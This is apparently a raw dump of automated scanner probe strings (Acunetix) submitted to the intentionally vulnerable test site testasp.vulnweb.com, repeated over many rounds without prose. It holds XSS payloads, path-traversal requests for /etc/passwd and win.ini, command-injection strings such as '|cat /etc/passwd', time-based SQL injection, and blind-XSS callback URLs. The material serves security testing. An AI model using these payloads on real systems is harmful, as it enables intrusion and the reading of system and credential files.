testasp.vulnweb.com

'"()

1

^(#$!@#$)(()))******

WEB-INF/web.xml

/etc/passwd

1

-1))

1<iframe src='data:text/html

"

1

1

1

1

1<body onload=prompt(931568)>

WEB-INF\web.xml

hrFOmdw0'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

||cat /etc/passwd

1

1

sQ3V6ltU')

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902500)>

1

hy7DdZKn'))

&dir

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<img src=xyz OnErRor=prompt(962503)>

1

1

1

1

'&dir&'

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img/src=">" onerror=alert(990192)>

1

1

"

1

1

1

"&dir&"

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1<ScRiPt%20>prompt(964872)</sCripT>

1

1

1

http://hitEQOWPquA9u.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1&lt

1

|dir

1

1

\xf6<img acu onmouseover=prompt(964192) //\xf6>

1

file:///etc/passwd

comments

1

1<input autofocus onfocus=prompt(978493)>

1

1

1

'|dir

<a href='http://www.acunetix.com'>website security</a>

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

'"

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

WEB-INF/web.xml

<!--

1

1_f9EaV <ScRiPt >prompt(936177)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1'"()&%<ScRiPt >prompt(960098)</ScRiPt>

1

1

&cat /etc/passwd&

1

1

1

response.write(9624416*9438526)

1

../../../../../../../../../../boot.ini

1

1

'"()&%<ScRiPt >prompt(903333)</ScRiPt>

1

1

1

'&cat /etc/passwd&'

'+response.write(9624416*9438526)+'

1_922527

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

"+response.write(9624416*9438526)+"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

................windowswin.ini

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

acu8806\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8806

${100196+99105}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(10.923),0)/*'XOR(if(now()=sysdate(),sleep(10.923),0))OR'"XOR(if(now()=sysdate(),sleep(10.923),0))OR"*/

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

|cat /etc/passwd#

1

acux10996\xc0\xbez1\xc0\xbcz2a\x90bcxuca10996

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(10.923)))v)/*'+(select(0)from(select(sleep(10.923)))v)+'"+(select(0)from(select(sleep(10.923)))v)+"*/

)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1<ScRiPt >prompt(972795)</ScRiPt>

1&n963894=v924354

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

1<script>prompt(905246)</script>

"|"ld

testasp.vulnweb.com

-1)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

1<ScRiPt >prompt(944459)</ScRiPt>

1

-1))

1

/etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994615></ScRiPt>

WEB-INF/web.xml

'"()

1

qisGAjWq'

1

1

1<ScRiPt >prompt(952617)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

WEB-INF\web.xml

'

1

1

1

qZEs7jJk')

1

1<video><source onerror="javascript:prompt(964711)">

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

rSRA1RQd'))

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973742)"></g></svg>

1

-1

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1<div style=width:expression(prompt(929092))>

-1)

&dir

1

1

"

acunetix_wvs_invalid_filename

1<iframe src='data:text/html

1

1

-1))

http://hitJPBTqdjsvw.bxss.me/

'&dir&'

1

${@print(md5(acunetix_wvs_security_test))}

1<body onload=prompt(908818)>

comments

xzv45a50'

file:///etc/passwd

1

1

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965774)>

comments

RFMVLg3k')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

RbY8tvOa'))

1<img src=xyz OnErRor=prompt(934723)>

|dir

1

comments/.

1

WEB-INF/web.xml

1

1<img/src=">" onerror=alert(981778)>

1

'|dir

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(988884)</sCripT>

WEB-INF\web.xml

http://www.acunetix.tst

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1&lt

1

'"

1

1

1'"()&%<ScRiPt >prompt(947642)</ScRiPt>

1

1

<!--

1

1

1

../../../../../../../../../../boot.ini

\xf6<img acu onmouseover=prompt(980796) //\xf6>

1

'"()&%<ScRiPt >prompt(956921)</ScRiPt>

1

1<input autofocus onfocus=prompt(989599)>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_938553

<a href='http://www.acunetix.com'>website security</a>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

response.write(9995752*9147661)

1

1

1

................windowswin.ini

&cat /etc/passwd&

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9995752*9147661)+'

1

1

'&cat /etc/passwd&'

1_IY03B <ScRiPt >prompt(938794)</ScRiPt>

"+response.write(9995752*9147661)+"

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

acu6981\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6981

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

acux6445\xc0\xbez1\xc0\xbcz2a\x90bcxuca6445

1

1

cat /etc/passwd

1<ScRiPt >prompt(957103)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

if(now()=sysdate(),sleep(11.346),0)/*'XOR(if(now()=sysdate(),sleep(11.346),0))OR'"XOR(if(now()=sysdate(),sleep(11.346),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1<script>prompt(988629)</script>

`cat /etc/passwd`

1

1

1

(select(0)from(select(sleep(11.346)))v)/*'+(select(0)from(select(sleep(11.346)))v)+'"+(select(0)from(select(sleep(11.346)))v)+"*/

1

1

1<ScRiPt >prompt(999255)</ScRiPt>

${99870+99384}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

1

|cat /etc/passwd#

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963686></ScRiPt>

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

-1)

1&n969416=v982393

1<ScRiPt >prompt(922116)</ScRiPt>

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

1

"|"ld

1<video><source onerror="javascript:prompt(968760)">

1

testasp.vulnweb.com

tTcVI0KX'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992987)"></g></svg>

1

x3lL6JMc')

1

'"()

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<div style=width:expression(prompt(939280))>

1

'

1

U5Kwhjct'))

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<iframe src='data:text/html

1

1

"

-1

1

1

1

1<body onload=prompt(921270)>

1

1

/etc/passwd

1

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946164)>

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1))

1<img src=xyz OnErRor=prompt(953089)>

'

1

&dir

acunetix_wvs_invalid_filename

1<img/src=">" onerror=alert(985727)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitHlWLBFPbcl.bxss.me/

sTYNV0az'

1

1

1

"

comments

1<ScRiPt%20>prompt(996621)</sCripT>

'&dir&'

1

wIlvnYOY')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1&lt

comments

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

U7ytrmlI'))

\xf6<img acu onmouseover=prompt(967451) //\xf6>

1

http://www.acunetix.tst

comments/.

${@print(md5(acunetix_wvs_security_test))}\

1

1

|dir

1

1

1<input autofocus onfocus=prompt(957830)>

1

file:///etc/passwd

1

'"

1

1

<a href='http://www.acunetix.com'>website security</a>

<!--

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"|dir

1

1

1

1

1

1_j76wS <ScRiPt >prompt(954692)</ScRiPt>

1

1'"()&%<ScRiPt >prompt(990386)</ScRiPt>

WEB-INF/web.xml

1

1

response.write(9453862*9299818)

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1

1

'+response.write(9453862*9299818)+'

'"()&%<ScRiPt >prompt(995088)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9453862*9299818)+"

1_939497

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../boot.ini

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

acu5230\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5230

cat /etc/passwd

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux3248\xc0\xbez1\xc0\xbcz2a\x90bcxuca3248

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

1

1

if(now()=sysdate(),sleep(9.561),0)/*'XOR(if(now()=sysdate(),sleep(9.561),0))OR'"XOR(if(now()=sysdate(),sleep(9.561),0))OR"*/

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(950225)</ScRiPt>

|cat /etc/passwd#

1

${99483+99752}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3.187)))v)/*'+(select(0)from(select(sleep(3.187)))v)+'"+(select(0)from(select(sleep(3.187)))v)+"*/

1

................windowswin.ini

1<script>prompt(935044)</script>

'|'ld

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1

1<ScRiPt >prompt(904839)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1&n977135=v917025

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?974593></ScRiPt>

-1)

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

testasp.vulnweb.com

1<ScRiPt >prompt(910051)</ScRiPt>

-1))

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

!(()&&!|*|*|

'

V3cyutBu'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<video><source onerror="javascript:prompt(952006)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'"()

^(#$!@#$)(()))******

1

1

"

1

mcECVnyQ')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933649)"></g></svg>

1

/etc/passwd

1

1

1

1

qMdCHKDD'))

1<div style=width:expression(prompt(922114))>

1

1

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

WEB-INF/web.xml

&dir

-1

1

1<iframe src='data:text/html

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

'&dir&'

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<body onload=prompt(922206)>

WEB-INF\web.xml

1

1

1

-1))

acunetix_wvs_invalid_filename

"

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972463)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hitoBsgvHuxqE.bxss.me/

|dir

1

kbN7ILFd'

comments

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=xyz OnErRor=prompt(960978)>

1

1OhLaNkX')

'|dir

comments

1

1

1<img/src=">" onerror=alert(927977)>

${@print(md5(acunetix_wvs_security_test))}\

1

comments/.

84hwe1gp'))

1

file:///etc/passwd

"|dir

1

1<ScRiPt%20>prompt(965014)</sCripT>

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1&lt

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

'"

WEB-INF/web.xml

1

\xf6<img acu onmouseover=prompt(952404) //\xf6>

1

<!--

1

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(984878)</ScRiPt>

1

1

1

1

1

1<input autofocus onfocus=prompt(998511)>

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(970739)</ScRiPt>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

../../../../../../../../../../boot.ini

response.write(9884189*9576754)

1_992115

[url=http://www.acunetix.com]website security[/url]

1

1

1

'+response.write(9884189*9576754)+'

&cat /etc/passwd&

1_PepxJ <ScRiPt >prompt(964447)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9884189*9576754)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

................windowswin.ini

1

1

1

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu8799\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8799

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd

1

1

acux10804\xc0\xbez1\xc0\xbcz2a\x90bcxuca10804

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3.047),0)/*'XOR(if(now()=sysdate(),sleep(3.047),0))OR'"XOR(if(now()=sysdate(),sleep(3.047),0))OR"*/

1<ScRiPt >prompt(920237)</ScRiPt>

${99319+99292}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(937786)</script>

1

1

|cat /etc/passwd#

1

(select(0)from(select(sleep(6.094)))v)/*'+(select(0)from(select(sleep(6.094)))v)+'"+(select(0)from(select(sleep(6.094)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1<ScRiPt >prompt(917333)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n980472=v951265

1

-1

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916196></ScRiPt>

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

-1)

1

)

1

1<ScRiPt >prompt(977855)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

!(()&&!|*|*|

1

-1))

1<video><source onerror="javascript:prompt(922725)">

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'

'"()

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952607)"></g></svg>

1

WEB-INF\web.xml

sapHHZVn'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

1

1<div style=width:expression(prompt(919854))>

1

e9cixDnh')

1

1

1<iframe src='data:text/html

/etc/passwd

1

1

1

||cat /etc/passwd

1

1

dcw4mlCg'))

1<body onload=prompt(956310)>

1

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972247)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

http://hitYIwxC7ihh2.bxss.me/

1

acunetix_wvs_invalid_filename

1

1<img src=xyz OnErRor=prompt(969078)>

-1)

1

"

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

1

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(936854)>

1

|dir

-1))

1

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(903017)</sCripT>

1

1

1

comments/.

3UGKERQx'

file:///etc/passwd

http://www.acunetix.tst

1

1

1

1

1&lt

1

HnNGr0iR')

'|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

LeszRCFy'))

\xf6<img acu onmouseover=prompt(938238) //\xf6>

1

1

WEB-INF/web.xml

1

<!--

"|dir

1

1

1<input autofocus onfocus=prompt(960151)>

1

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(979826)</ScRiPt>

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'"()&%<ScRiPt >prompt(927119)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

[url=http://www.acunetix.com]website security[/url]

response.write(9825538*9882777)

1

1

1_988531

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9825538*9882777)+'

../../../../../../../../../../boot.ini

1_95joe <ScRiPt >prompt(935265)</ScRiPt>

1

1

'&cat /etc/passwd&'

"+response.write(9825538*9882777)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

cat /etc/passwd

1

1

1

................windowswin.ini

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

${100329+99178}

1

1

acu5273\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5273

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

|cat /etc/passwd#

1

1

acux5729\xc0\xbez1\xc0\xbcz2a\x90bcxuca5729

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt >prompt(975725)</ScRiPt>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

'|'ld

1&n990889=v930228

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

-1

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<script>prompt(937771)</script>

"|"ld

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(976164)</ScRiPt>

1

)

-1))

1

testasp.vulnweb.com

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913458></ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1IxUiU9A'

1

1

WEB-INF/web.xml

1

'

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(990165)</ScRiPt>

mlqSjA96')

WEB-INF\web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

"

'"()

1

1<video><source onerror="javascript:prompt(937367)">

wkoZDUhh'))

1

1

1

/etc/passwd

1

-1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987924)"></g></svg>

1

1

||cat /etc/passwd

1

1

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<div style=width:expression(prompt(903498))>

1

1

1

&dir

-1))

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'

Xc3C3A7b'

1

'&dir&'

1<body onload=prompt(904966)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955220)>

sOOG5Bs4')

"

1

"&dir&"

1

1

http://hittvEQqAxaCz.bxss.me/

comments

1<img src=xyz OnErRor=prompt(977486)>

jRAIeSmr'))

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(927229)>

1

comments

1

1

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1<ScRiPt%20>prompt(958021)</sCripT>

comments/.

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

'|dir

1&lt

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

1'"()&%<ScRiPt >prompt(909950)</ScRiPt>

1

\xf6<img acu onmouseover=prompt(979326) //\xf6>

"|dir

1

1

1

1

'"()&%<ScRiPt >prompt(961525)</ScRiPt>

<!--

1

1

1

1<input autofocus onfocus=prompt(953225)>

1

1

1_909337

1

WEB-INF/web.xml

1

response.write(9446743*9826374)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

WEB-INF\web.xml

1

1

'+response.write(9446743*9826374)+'

1

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini

&cat /etc/passwd&

"+response.write(9446743*9826374)+"

1

1

1_DbGBO <ScRiPt >prompt(941526)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../boot.ini

1

1

acu10404\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10404

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

acux2359\xc0\xbez1\xc0\xbcz2a\x90bcxuca2359

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

1

1

1<ScRiPt >prompt(912090)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<script>prompt(985566)</script>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

${99761+99131}

1<ScRiPt >prompt(903626)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

..\..\..\..\..\..\..\..\windows\win.ini

1

|cat /etc/passwd#

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909474></ScRiPt>

1some_inexistent_file_with_long_name%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1&n984814=v905627

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1<ScRiPt >prompt(935621)</ScRiPt>

1

1

OwpJY1lg'

!(()&&!|*|*|

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

